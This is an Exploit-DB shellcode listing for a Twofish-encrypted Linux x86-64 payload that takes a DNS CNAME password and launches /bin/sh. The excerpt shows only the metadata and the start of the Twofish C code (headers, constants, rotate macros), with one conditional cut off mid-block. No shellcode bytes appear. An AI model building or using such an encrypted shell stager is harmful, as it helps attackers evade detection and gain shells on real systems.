Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

EDB-ID: 43956
Author: 0x4ndr3
Published: 2018-02-02
Type: Shellcode
Platform: Linux_x86-64
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Shellcode: Download Shellcode Code Download / View Raw

Optimized Twofish C implementation by Drew Csillag:
Partially re-written by Andre Lima ( to encrypt/decrypt variable length Linux x86_64 shellcode.

compiler is gcc(egcs-2.91.66)
flags are -O3 -fomit-frame-pointer -Wall
Processor is 233Mhz Pentium II (Deschutes)
OS is Linux 2.2.16

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "tables.h"
#define u32 unsigned int
#define BYTE unsigned char
#define RS_MOD 0x14D
#define RHO 0x01010101L

gcc is smart enough to convert these to roll instructions. If you want
to see for yourself, either do gcc -O3 -S, or change the |'s to +'s and
see how slow things get (you lose about 30-50 clocks) :).
#define ROL(x,n) (((x) << ((n) & 0x1F)) | ((x) >> (32-((n) & 0x1F))))
#define ROR(x,n) (((x) >> ((n) & 0x1F)) | ((x) << (32-((n) & 0x1F))))

#if BIG_ENDIAN == 1
#define BSWAP(x) (((ROR(x,8) & 0xFF00FF00) | (ROL(x,8) & 0x00FF00FF)))
#define BSWAP(x) (x)
Related Posts